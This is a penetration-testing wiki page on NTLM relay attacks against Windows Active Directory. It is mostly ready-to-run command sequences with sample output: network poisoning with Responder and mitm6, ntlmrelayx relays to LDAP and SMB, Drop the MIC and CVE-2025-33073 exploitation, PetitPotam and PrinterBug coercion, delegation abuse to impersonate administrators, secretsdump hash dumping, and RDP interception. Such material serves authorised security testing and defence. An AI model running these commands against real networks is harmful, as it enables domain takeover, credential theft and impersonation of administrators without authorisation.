internal-relay-ntlm.md (20658B)
1 --- 2 title: "Internal - NTLM Relay" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/internal-relay-ntlm.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-relay-ntlm.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Internal - NTLM Relay 12 13 NTLMv1 and NTLMv2 can be relayed to connect to another machine. 14 15 | Hash | Hashcat | Attack method | 16 |-----------------------|---------|----------------------| 17 | LM | `3000` | crack/pass the hash | 18 | NTLM/NTHash | `1000` | crack/pass the hash | 19 | NTLMv1/Net-NTLMv1 | `5500` | crack/relay attack | 20 | NTLMv2/Net-NTLMv2 | `5600` | crack/relay attack | 21 22 Crack the hash with `hashcat`. 23 24 ```powershell 25 hashcat -m 5600 -a 0 hash.txt crackstation.txt 26 ``` 27 28 ## MS08-068 NTLM reflection 29 30 NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. 31 32 > This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. 33 34 * <https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068> 35 36 ```powershell 37 msf > use exploit/windows/smb/smb_relay 38 msf exploit(smb_relay) > show targets 39 ``` 40 41 ## LDAP signing not required and LDAP channel binding disabled 42 43 During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed: 44 45 * LDAP signing not required (by default set to `Not required`) 46 * LDAP channel binding is disabled. (by default disabled) 47 * `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default) 48 49 Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer. 50 51 ```bash 52 # On first terminal 53 sudo ./Responder.py -I eth0 -wfrd -P -v 54 55 # On second terminal 56 sudo python ./ntlmrelayx.py -t ldaps://IP_DC --add-computer 57 ``` 58 59 It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection. 60 61 ## SMB Signing Disabled and IPv4 62 63 If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning** 64 65 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. 66 67 ```powershell 68 [Responder Core] 69 ; Servers to start 70 ... 71 SMB = Off # Turn this off 72 HTTP = Off # Turn this off 73 ``` 74 75 2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. 76 3. Run `python Responder.py -I <interface_card>` 77 4. Use a relay tool such as `ntlmrelayx` or `MultiRelay` 78 * `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list. 79 * `python MultiRelay.py -t <target_machine_IP> -u ALL` 80 5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. 81 82 ```powershell 83 $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support 84 [*] Servers started, waiting for connections 85 Type help for list of commands 86 ntlmrelayx> socks 87 Protocol Target Username Port 88 -------- -------------- ------------------------ ---- 89 MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 90 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 91 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 92 93 # You might need to select a target with "-t" 94 # smb://, mssql://, http://, https://, imap://, imaps://, ldap://, ldaps:// and smtp:// 95 impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support 96 impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support 97 98 # the socks proxy can then be used with your Impacket tools or netexec 99 $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 100 $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth 101 $ proxychains netexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" 102 ``` 103 104 **Mitigations**: 105 106 * Disable LLMNR via group policy 107 108 ```powershell 109 Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled 110 ``` 111 112 * Disable NBT-NS 113 114 ```powershell 115 This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP 116 ``` 117 118 ## SMB Signing Disabled and IPv6 119 120 Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. 121 122 ```powershell 123 netexec smb $hosts --gen-relay-list relay.txt 124 125 # DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 126 # -d is the domain name that we filter our request on - the attacked domain 127 # -i is the interface we have mitm6 listen on for events 128 mitm6 -i eth0 -d $domain 129 130 # spoofing WPAD and relaying NTLM credentials 131 impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt 132 impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug 133 134 # -ip is the interface you want the relay to run on 135 # -wh is for WPAD host, specifying your wpad file to serve 136 # -t is the target where you want to relay to. 137 impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2 138 ``` 139 140 ## Drop the MIC - CVE-2019-1040 141 142 > The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP 143 144 Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) 145 146 ```powershell 147 python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' 148 [*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth 149 [*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) 150 ``` 151 152 * Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD 153 154 ```powershell 155 TERM1> python printerbug.py testsegment.local/username@s2012exc.testsegment.local <attacker ip/hostname> 156 TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support 157 TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc 158 ``` 159 160 * Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. 161 162 ```powershell 163 # create a new machine account 164 TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support 165 TERM2> python printerbug.py relaytest.local/username@second-dc-server 10.0.2.6 166 TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME 167 168 # connect using the ticket 169 export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache 170 secretsdump.py -k -no-pass second-dc-server.local -just-dc 171 ``` 172 173 ## Drop the MIC 2 - CVE-2019-1166 174 175 > A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features. To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature. 176 177 * Unset the signing flags in the `NTLM_NEGOTIATE` message (`NTLMSSP_NEGOTIATE_ALWAYS_SIGN`, `NTLMSSP_NEGOTIATE_SIGN`) 178 * Inject a rogue msvAvFlag field in the `NTLM_CHALLENGE` message with a value of zeros 179 * Remove the MIC from the `NTLM_AUTHENTICATE` message 180 * Unset the following flags in the `NTLM_AUTHENTICATE` message: `NTLMSSP_NEGOTIATE_ALWAYS_SIGN`, `NTLMSSP_NEGOTIATE_SIGN`, `NEGOTIATE_KEY_EXCHANGE`, `NEGOTIATE_VERSION`. 181 182 ```ps1 183 ntlmrelayx.py -t ldap://dc.domain.com --escalate-user 'youruser$' -smb2support --remove-mic --delegate-access 184 ``` 185 186 ## Ghost Potato - CVE-2019-1384 187 188 Requirements: 189 190 * User must be a member of the local Administrators group 191 * User must be a member of the Backup Operators group 192 * Token must be elevated 193 194 Using a modified version of ntlmrelayx : <https://shenaniganslabs.io/files/impacket-ghostpotato.zip> 195 196 ```powershell 197 ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe 198 ``` 199 200 ## RemotePotato0 DCOM DCE RPC relay 201 202 > It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine 203 204 Requirements: 205 206 * a shell in session 0 (e.g. WinRm shell or SSH shell) 207 * a privileged user is logged on in the session 1 (e.g. a Domain Admin user) 208 209 ```powershell 210 # https://github.com/antonioCoco/RemotePotato0/ 211 Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016 212 Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 213 Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2 214 Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' 215 ``` 216 217 ## DNS Poisonning - Relay delegation with mitm6 218 219 Requirements: 220 221 * IPv6 enabled (Windows prefers IPV6 over IPv4) 222 * LDAP over TLS (LDAPS) 223 224 > ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it. 225 226 ```powershell 227 git clone https://github.com/fox-it/mitm6.git 228 cd /opt/tools/mitm6 229 pip install . 230 231 mitm6 -hw ws02 -d lab.local --ignore-nofqnd 232 # -d: the domain name that we filter our request on (the attacked domain) 233 # -i: the interface we have mitm6 listen on for events 234 # -hw: host whitelist 235 236 ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad 237 ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad --add-computer 238 # -ip: the interface you want the relay to run on 239 # -wh: WPAD host, specifying your wpad file to serve 240 # -t: the target where you want to relay to 241 242 # now granting delegation rights and then do a RBCD 243 ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad 244 getST.py -spn cifs/target.lab.local lab.local/GENERATED\$ -impersonate Administrator 245 export KRB5CCNAME=administrator.ccache 246 secretsdump.py -k -no-pass target.lab.local 247 ``` 248 249 ## NTLM Reflection - CVE-2025-33073 250 251 * Add a DNS record for `[SERVERNAME] + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` pointing to our IP address. It is also possible to compromise any vulnerable machine by registering `localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA`. 252 253 ```ps1 254 dnstool.py -u 'domain.local\username' -p 'P@ssw0rd' 10.10.10.10 -a add -r target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 198.51.100.27 255 # OR 256 pretender -i "vmnet2" --spoof "target1UWhR..." --no-dhcp --no-timestamps 257 ``` 258 259 * Start the relay to catch the callback from TARGET. 260 261 ```ps1 262 ntlmrelayx.py -t smb://TARGET.domain.local -smb2support 263 ntlmrelayx.py -t smb://TARGET.domain.local -smb2support -c 'type C:\Users\Administrator\Desktop\flag.txt' 264 ``` 265 266 * Trigger a callback from the server to `[SERVERNAME] + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` using PetitPotam. 267 268 ```ps1 269 nxc smb TARGET.domain.local -u username -p 'P@ssw0rd' -M coerce_plus -o M=Petitpotam LISTENER=target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 270 # OR 271 petitpotam.py -d domain.local -u username -p 'password' "TARGET1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" "TARGET.DOMAIN.LOCAL" 272 ``` 273 274 ## Relaying with WebDav Trick 275 276 > Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB 277 278 **Requirement**: 279 280 * WebClient service 281 282 **Exploitation**: 283 284 * Discover machines on the network with enabled WebClient service 285 286 ```ps1 287 webclientservicescanner 'domain.local'/'user':'password'@'machine' 288 netexec smb 10.10.10.10 -d 'domain' -u 'user' -p 'password' -M webdav 289 GetWebDAVStatus.exe 'machine' 290 ``` 291 292 * Disable HTTP in Responder 293 294 ```ps1 295 sudo vi /usr/share/responder/Responder.conf 296 ``` 297 298 * Generate a Windows machine name, e.g: "WIN-UBNW4FI3AP0" 299 300 ```ps1 301 sudo responder -I eth0 302 ``` 303 304 * Prepare for RBCD against the DC 305 306 ```ps1 307 python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support 308 ``` 309 310 * Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.10.10.10`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. 311 312 ```ps1 313 # PrinterBug 314 dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP" 315 SpoolSample.exe "TARGET_IP" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" 316 317 # PetitPotam 318 Petitpotam.py "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP" 319 Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP" 320 PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP" 321 ``` 322 323 * Use the created account to ask for a service ticket: 324 325 ```ps1 326 .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l<i$;UzD7W' 327 .\Rubeus.exe s4u /user:WVLFLLKZ$ /aes256:E0B3D87B512C218D38FAFDBD8A2EC55C83044FD24B6D740140C329F248992D8F /impersonateuser:Administrator /msdsspn:host/pc1.purple.lab /altservice:cifs /nowrap /ptt 328 ls \\PC1.purple.lab\c$ 329 # IP of PC1: 10.0.0.4 330 ``` 331 332 An alternative for the previous exploitation method is to register a **DNS entry** for the attack machine by yourself then trigger the coercion. 333 334 ```ps1 335 python3 /opt/krbrelayx/dnstool.py -u lab.lan\\jdoe -p 'P@ssw0rd' -r attacker.lab.lan -a add -d 192.168.1.50 192.168.1.2 336 python3 /opt/PetitPotam.py -u jdoe -p 'P@ssw0rd' -d lab.lan attacker@80/test 192.168.1.3 337 ``` 338 339 ## Man-in-the-middle RDP connections with pyrdp-mitm 340 341 * [GoSecure/pyrdp](https://github.com/GoSecure/pyrdp) 342 * [RDP Man-in-the-Middle – Smile! You’re on Camera](https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera) 343 344 **Usage** 345 346 ```sh 347 pyrdp-mitm.py <IP> 348 pyrdp-mitp.py <IP>:<PORT> # with custom port 349 pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate 350 ``` 351 352 **Exploitation** 353 354 * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge 355 * If NLA is disabled, you will obtain the password in plaintext 356 * Other features are available such as keystroke recording 357 358 **Alternatives** 359 360 * [SySS-Research/Seth](https://github.com/SySS-Research/Seth), performs ARP spoofing prior to launching the RDP listener 361 362 ## Relay IIS AppPool to Local Administrator 363 364 * HTTP coerce from the targeted machine 365 366 ```ps1 367 powershell iwr http://10.10.10.2 -UseDefaultCredentials 368 ``` 369 370 * Relay to LDAP 371 372 ```ps1 373 ntlmrelayx -t ldap://10.10.10.1 -smb2support --interactive 374 ``` 375 376 * Connect to the interactive LDAP shell via TCP 377 378 ```ps1 379 nc 127.0.0.1 <PORT> 380 ``` 381 382 * Enable TLS and setup RBCD 383 384 ```ps1 385 start_tls 386 add_computer fakePC P@ssword123 387 set_rbcd TARGET$ fakePC$ 388 ``` 389 390 * Impersonate the administrator 391 392 ```ps1 393 getST.py -spn 'cifs/target.lab.local' -impersonate Administrator -dc-ip 'dc.lab.local' 'lab.local/fakePC$:P@ssword123' 394 export KRB5CCNAME=/tmp/Administrator@cifs_target.lab.local@LAB.LOCAL.ccache 395 wmiexec.py -k -no-pass @target.lab.local 396 ``` 397 398 ## Common Issues Forwarding Port 445 399 400 By default the SMB service is listening on port 445, blocking any relaying attempt on this port 401 402 **Technique #1**: Forward port 445 on Windows machine using a driver 403 404 * [praetorian-inc/PortBender](https://github.com/praetorian-inc/PortBender) - TCP Port Redirection Utility 405 406 ```ps1 407 rportfwd 8445 127.0.0.1 445 # Machine 8445 redirected to Teamserver 445 408 sudo proxychains python3 examples/ntlmrelayx.py -t smb://10.10.10.10 -smb2support # relay SMB to 10.10.10.10 409 410 upload WinDivert32.sys 411 upload WinDivert64.sys 412 413 PortBender redirect 445 8445 # Redirect port 445 to 8445 on the machine 414 ``` 415 416 **Technique #2**: Disable SMB service, to easily portforward port 445 417 418 * [zyn3rgy/smbtakeover](https://github.com/zyn3rgy/smbtakeover) - BOF and Python3 implementation of technique to unbind 445/tcp on Windows via SCM interactions 419 420 ```ps1 421 python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 check 422 python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 stop 423 python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 start 424 425 bof_smbtakeover localhost check 426 bof_smbtakeover 10.0.0.21 stop 427 bof_smbtakeover localhost start 428 429 rportfwd_local 445 127.0.0.1 445 430 ``` 431 432 * [Windows/sc.exe](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/sc-config) 433 434 ```ps1 435 sc config LanmanServer start= disabled 436 sc stop LanmanServer 437 sc stop srv2 438 sc stop srvnet 439 ``` 440 441 * [XiaoliChan/wmiexec-Pro](https://github.com/XiaoliChan/wmiexec-Pro) 442 443 ```ps1 444 wmiexec-pro.py lab.local/admin@target.lab.local service -action disable -service-name "LanmanServer" 445 wmiexec-pro.py lab.local/admin@target.lab.local service -action stop -service-name "LanmanServer" 446 wmiexec-pro.py lab.local/admin@target.lab.local service -action stop -service-name "srv2" 447 wmiexec-pro.py lab.local/admin@target.lab.local service -action disable -service-name "srvnet" 448 wmiexec-pro.py lab.local/admin@target.lab.local service -action getinfo -service-name "srvnet" 449 ``` 450 451 ## References 452 453 * [Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayx - Quentin Roland - January 27, 2025](https://www.synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with) 454 * [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) 455 * [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema - June 13, 2019](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) 456 * [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/) 457 * [NTLM reflection is dead, long live NTLM reflection! – An in-depth analysis of CVE-2025-33073 - Wilfried Bécard and Guillaume André - June 11, 2025](https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025) 458 * [NTLM Relaying to LDAP - The Hail Mary of Network Compromise - @logangoins - July 23, 2024](https://logan-goins.com/2024-07-23-ldap-relay/) 459 * [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) 460 * [Relay Your Heart Away - An OPSEC-Conscious Approach to 445 Takeover - Nick Powers (@zyn3rgy) - Aug 1, 2024](https://posts.specterops.io/relay-your-heart-away-an-opsec-conscious-approach-to-445-takeover-1c9b4666c8ac) 461 * [Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover - Nick Powers (@zyn3rgy) - July 27, 2024](https://www.youtube.com/watch?v=iBqOOkQGJEA) 462 * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher - Mar 9, 2018](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)